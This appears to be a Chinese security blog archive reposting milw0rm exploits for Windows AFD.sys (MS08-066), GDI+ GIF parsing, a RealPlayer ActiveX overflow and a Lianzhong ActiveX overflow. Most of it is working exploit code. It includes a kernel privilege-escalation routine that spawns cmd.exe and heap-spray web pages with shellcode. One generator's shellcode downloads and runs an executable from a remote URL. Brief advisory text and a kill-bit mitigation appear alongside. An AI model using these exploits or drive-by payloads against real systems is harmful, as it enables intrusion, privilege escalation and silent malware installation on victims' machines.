STARTUPINFOA stStartup; DWORD HookAddress = 0x80538ab8; //HalDispatchTable address,修改KeQueryIntervalProfile的call function 的地址 //8062cdc2 ff15bc8a5380 call dword ptr [nt!HalDispatchTable+0x4 (80538abc)] PVOID ShellCodeMemory = (PVOID)0x01000000 ; DWORD MemorySize = 0x1000; PNTALLOCATE NtAllocateVirtualMemory; PNTQUERYINTERVAL NtQueryIntervalProfile; THREAD_PARAMS lParams = {0}; char inBuff[0x40]; char outBuff[0x40]; DWORD junk ; SOCKET tcp_socket; struct sockaddr_in peer; WSADATA ws; WSAStartup(0x0202,&ws); NtAllocateVirtualMemory = (PNTALLOCATE) GetProcAddress(GetModuleHandle( "ntdll.dll"), "NtAllocateVirtualMemory"); NtQueryIntervalProfile = ( PNTQUERYINTERVAL ) GetProc Address(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); status = NtAllocateVirtualMemory( (HANDLE)-1, &ShellCodeMemory, 0, &MemorySize, MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE ); memset( ShellCodeMemory, 0x90, MemorySize ); memcpy((void*)((BYTE*)ShellCodeMemory + 0x100),ShellCode,80); //"127.0.0.1" 在内存里==0x0100007F,所以shellcode放在后面（0x01000100）就没问题了 lParams.hInitEvent = CreateEvent(0, FALSE, FALSE, 0); lParams.hReadyEvent = CreateEvent(0, FALSE, FALSE, 0); memset(inBuff,0x90,sizeof(inBuff)); memset(outBuff,0x90,sizeof(outBuff)); CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)FooServer, (LPVOID)&lParams, 0, NULL); peer.sin_family = AF_INET; peer.sin_port = htons( 0x8888 ); peer.sin_addr.s_addr = inet_addr( "127.0.0.1" ); tcp_socket = socket(AF_INET, SOCK_STREAM, 0); WaitForSingleObject(lParams.hInitEvent, -1); connect(tcp_socket, (struct sockaddr*) &peer, sizeof(sockaddr_in)); DeviceIoControl((HANDLE)tcp_socket, 0x1203f, (LPVOID)inBuff,sizeof(inBuff), (LPVOID)HookAddress,0, &junk, NULL); NtQueryIntervalProfile(3,&result); SetEvent(lParams.hReadyEvent); GetStartupInfo( &stStartup ); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, NULL, NULL, NULL, &stStartup, &pi ); return 0; }

Reference:

http://www.milw0rm.com/exploits/6757 - MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) by Ruben Santamarta
http://www.whitecell.org/list.php?id=60 - Windows XP 核心驱动 AFD.sys 本地权限提升漏洞分析(ms08066) by Polymorphours

http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx

分类: 矩阵毒刺标签: Exploit

MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)

2008年10月16日 Chinadu 没有评论

Hi,

I have just uploaded a k-plugin for Kartoffel, which exploits a flaw
patched in the recent MS08-066 bulletin.

http://kartoffel.reversemode.com/downloads.php
backup: http://milw0rm.com/sploits/2008-afd_plugin.zip

For those researchers interesting in digging a little bit more into this
flaw, just take a look at afd!AfdGetRemoteAddress and/or check this out

http://blogs.technet.com/swi/archive/2008/10/14/ms08-066-how-to-correctly-validate-and-capture-user-mode-data.aspx

Regards,
Rubén.

# milw0rm.com [2008-10-15]

分类: 矩阵毒刺标签: Exploit

MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046)

2008年10月12日 Chinadu 没有评论

EMR_SETICMPROFILEA Heap Overflow DOS

By Ac!dDrop

related to MS08-046

Tested on windows Xp professional Sp2
mscms.dll 5.1.2600.2709
gdi32.dll 5.1.2600.2818

Causes Windows explorer and Internet explorer to crash.

You can run arbitary code.

http://milw0rm.com/sploits/2008-emf_MS08-046.rar

# milw0rm.com [2008-10-12]

分类: 矩阵毒刺标签: Exploit

MS Windows GDI+ Proof of Concept (MS08-052) #2

2008年10月12日 Chinadu 没有评论

Operating System: XP SP2
Gdiplus.dll Version: 5.1.3102.2180

Credit:

John Smith,
Evil Fingers

GIF Template Reference: http://www.sweetscape.com/010editor/templates/files/GIFTemplate.bt

PoC Link: http://www.evilfingers.com/patchTuesday/MS08_052_GDI+_Vulnerability_ver2.txt

http://www.evilfingers.com/patchTuesday/PoC.php
============================================================================================================

#!/usr/bin/perl
#
use strict;

my $gif =

"\x47\x49\x46\x38\x39\x61". # GIF header
"\x65\x00\x65\x00\xF7\x0B\x0B". # Logical Screen Descriptor
# COLOR Stream
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33\x33".
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (1) Size: 21+1
#0
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#1
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC".
"\x21\xEC".
#2
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#3
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#4
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#5
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#6
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#7
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\x2C\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#8
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#9
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#10
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\x2C\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC".
#11
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC".
"\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x21\xEC\x2C\x00\x00\x00\x00\x0E".
"\x01\x5A".
"\x00". ## Terminator
"\x21". ## Extension Introducer 0x21
"\x2C". ## Label 0x2C
# Data Sub-blocks (2) Size: EC+1
#0
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#1
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x6
2\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#2
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#3
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
#4
"\xEC\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61".
"\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62\x61\x62".
"\x00". # Terminator
"\x3B". # Trailer

open(out, "> crash.gif");
binmode(out);
print (out $gif);
close(out);

# milw0rm.com [2008-10-09]

分类: 矩阵毒刺标签: Exploit

Google Chrome Browser 0.2.149.27 Automatic File Download Exploit

2008年9月8日 Chinadu 没有评论

Author: nerex
E-mail: nerex[at]live[dot]com

Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.

This proof-of-concept was created for educational purposes only.Use the code it at your own risk.The author will not be responsible for any damages.

Tested on Windows Vista SP1 and Windows XP SP3 with Google Chrome (BETA)
**************************************************************************

分类: 矩阵毒刺标签:

RealPlayer 最新网马

2007年11月25日 Chinadu 没有评论


if(RealVersion.indexOf("6.0.14.") == -1)
{
  if(navigator.userLanguage.toLowerCase() == "zh-cn")
   ret = unescape("%7f%a5%60");
  else if(navigator.userLanguage.toLowerCase() == "en-us")
   ret = unescape("%4f%71%a4%60");
  else
   return;
}
else if(RealVersion == "6.0.14.544")
  ret = unescape("%63%11%08%60");
else if(RealVersion == "6.0.14.550")
  ret = unescape("%63%11%04%60");
else if(RealVersion == "6.0.14.552")
  ret = unescape("%79%31%01%60");
else if(RealVersion == "6.0.14.543")
  ret = unescape("%79%31%09%60");
else if(RealVersion == "6.0.14.536")
  ret = unescape("%51%11%70%63");
else
  return;
if(RealVersion.indexOf("6.0.10.") != -1)
{
  for(i=0;i<4;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.11.") != -1)
{
  for(i=0;i<6;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.12.") != -1)
{
  for(i=0;i<9;i++)
   Padding = Padding + JmpOver;
  Padding = Padding + ret;
}
else if(RealVersion.indexOf("6.0.14.") != -1)
{
  for(i=0;i<10;i++)
   Padding = Padding + JmpOver;
   Padding = Padding + ret;
}

AdjESP = "LLLL\\XXXXXLD"; Shell = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIJKBtnkSEgLnkD4vUT8fczUpVLKQfa04CHuFSJiCyqQnMFSIKtvvomnVtFHfXYbbTTHYQzkTMgsxZ3pjKHoUkyO1eJGqNlKsnQ4S3YMRFnkDL2knkQNELeSIMNkGtlKFckukspuSB2LrMrOpnTnE4RLRLS01S7JclRuVNSUt8PegpEcIPU4vcQPP0ahTLnkaP4LNkppwlNMLKSps8JKS9lKCpUdLMcpcLNkaPWLJ5OOLNbn4NjLzHNdKOyokOmS8ls4K3dltd7LIoN0lUv0MoTv4ZdoBPhhROkOKOYoLKSdWTkLLMSbNZVSYKrsbs3bzKfD0SKOjp1MOONxKNozTNm8scioKOkONcJLUTK3VLQ4qrKOxPMosNkhm2qcHhspKOkO9obrkOXPkXKg9oKO9osXsDT4pp4zvODoE4ea6NPlrLQcu71yrNcWTne3poPmTo2DDqFOprrLDnpecHQuWp"; PayLoad = Padding + AdjESP + Shell; while(PayLoad.length < 0x8000) PayLoad += "YuanGe"; // 汗~袁哥~-.=! Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0); } RealExploit();") </script>

关于该漏洞的说明(来自绿盟):

Quotation
RealPlayer ierpplug.dll ActiveX控件播放列表名称栈溢出漏洞
RealPlayer是一款流行的媒体播放器，支持多种媒体格式。

RealPlayer的MPAMedia.dll库所提供的RealPlayer数据库组件在处理播放列表名时存在栈溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

由于可使用ierpplug.dll所提供的IERPCtl ActiveX控件将本地文件导入到RealPlayer中指定的播放列表，因此如果用户受骗访问了恶意网页并通过IERPCtl ActiveX控件的Import()方式导入了恶意文件的话，就可以触发这个溢出，导致拒绝服务或执行任意指令。

< *来源：Will Dormann

链接：http://www.symantec.com/enterprise/security_response/weblog/2007/10/realplayer_exploit_on_the_loos.h
http://www.kb.cert.org/vuls/id/871673
http://service.real.com/realplayer/security/191007_player/en/
http://secunia.com/advisories/27248/
http://www.us-cert.gov/cas/techalerts/TA07-297A.html
*>

建议：
--------------------------------------------------------------------------------
临时解决方法：

在IE中禁用IERPCtl ActiveX控件，为以下CLSID设置kill bit：

{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}

或将以下文本保存为.REG文件并导入：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{FDC7A535-4070-4B92-A0EA-D9994BCC0DC5}]
"Compatibility Flags"=dword:00000400

分类: 矩阵毒刺标签: RealPlayer, 网马

联众ConnectAndEnterRoom ActiveX控件栈溢出漏洞(exp)

2007年11月24日 Chinadu 没有评论

exeurl = InputBox( "请输入下载执行exe的地址：", "输入","http://np.icehack.com/np.exe" ) 'code by NetPatch if exeurl <> "" then code="\xe9\xf3\x00\x00\x00\x90\x90\x90\x90\x5a\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40\x08\x8b\xd8\x8b\x73\x3c\x8b\x74\x1e\x78\x03\xf3\x8b\x7e\x20\x03\xfb\x8b\x4e\x14\x33\xed\x56\x57\x51\x8b\x3f\x03\xfb\x8b\xf2\x6a\x0e\x59\xf3\xa6\x74\x08\x59\x5f\x83\xc7\x04\x45\xe2\xe9\x59\x5f\x5e\x8b\xcd\x8b\x46\x24\x03\xc3\xd1\xe1\x03\xc1\x33\xc9\x66\x8b\x08\x8b\x46\x1c\x03\xc3\xc1\xe1\x02\x03\xc1\x8b\x00\x03\xc3\x8b\xfa\x8b\xf7\x83\xc6\x0e\x8b\xd0\x6a\x04\x59\xe8\x6a\x00\x00\x00\x83\xc6\x0d\x52\x56\xff\x57\xfc\x5a\x8b\xd8\x6a\x01\x59\xe8\x57\x00\x00\x00\x83\xc6\x13\x56\x46\x80\x3e\x80\x75\xfa\x80\x36\x80\x5e\x83\xec\x40\x8b\xdc\xc7\x03\x63\x6d\x64\x20\x43\x43\x43\x43\x66\xc7\x03\x2f\x63\x43\x43\xc6\x03\x20\x43\x6a\x20\x53\xff\x57\xec\xc7\x04\x03\x5c\x61\x2e\x65\xc7\x44\x03\x04\x78\x65\x00\x00\x33\xc0\x50\x50\x53\x56\x50\xff\x57\xfc\x8b\xdc\x6a\x00\x53\xff\x57\xf0\x68\x51\x24\x40\x00\x58\xff\xd0\x33\xc0\xac\x85\xc0\x75\xf9\x51\x52\x56\x53\xff\xd2\x5a\x59\xab\xe2\xee\x33\xc0\xc3\xe8\x0c\xff\xff\xff\x47\x65\x74\x50\x72\x6f\x63\x41\x64\x64\x72\x65\x73\x73\x00\x47\x65\x74\x53\x79\x73\x74\x65\x6d\x44\x69\x72\x65\x63\x74\x6f\x72\x79\x41\x00\x57\x69\x6e\x45\x78\x65\x63\x00\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00\x4c\x6f\x61\x64\x4c\x69\x62\x72\x61\x72\x79\x41\x00\x75\x72\x6c\x6d\x6f\x6e\x00\x55\x52\x4c\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x54\x6f\x46\x69\x6c\x65\x41\x00"&Unicode(exeurl&Chr(00)&Chr(00)) Function Unicode(str1) Dim str,temp str = "" For i=1 to len(str1) temp = Hex(AscW(Mid(str1,i,1))) If len(temp) < 5 Then temp = right("0000"&temp, 2) str = str & "\x" & temp Next Unicode = str End Function function replaceregex(str) set regex=new regExp regex.pattern="\\x(..)\\x(..)" regex.IgnoreCase=true regex.global=true matches=regex.replace(str,"%u$2$1") replaceregex=matches end Function set fso=CreateObject("scripting.filesystemobject") set fileS=fso.opentextfile("netpatch.htm",8,true) fileS.writeline "<html>" fileS.writeline "<object classid=""clsid:AE93C5DF-A990-11D1-AEBD-5254ABDD2B69"" id='target'></object>" fileS.writeline "<body>" fileS.writeline "<SCRIPT language=""JavaScript"">" fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");" fileS.writeline "var bigblock = unescape(""%u9090%u9090"");" fileS.writeline "var headersize = 20;" fileS.writeline "var slackspace = headersize+shellcode.length;" fileS.writeline "while (bigblock.length<slackspace) bigblock+=bigblock;" fileS.writeline "fillblock = bigblock.substring(0, slackspace);" fileS.writeline "block = bigblock.substring(0, bigblock.length-slackspace);" fileS.writeline "while(block.length+slackspace<0x40000) block = block+block+fillblock;" fileS.writeline "memory = new Array();" fileS.writeline "for (x=0; x<300; x++) memory[x] = block +shellcode;" fileS.writeline "var buffer = '';" fileS.writeline "while (buffer.length < 164) buffer+=""A"";" fileS.writeline "buffer=buffer+""\x0a\x0a\x0a\x0a""+buffer;" fileS.writeline "ok=""ok"";" fileS.writeline "target.ConnectAndEnterRoom(buffer,ok,ok,ok,ok,ok );" fileS.writeline "</script>" fileS.writeline "</body>" fileS.writeline "</html>"files.Close Set fso=nothing msgbox "生成完毕!" end if

分类: 矩阵毒刺标签: Exploit

我在入侵渗透中用过的三则VBS代码

2007年11月16日 Chinadu 没有评论

作者：lcx

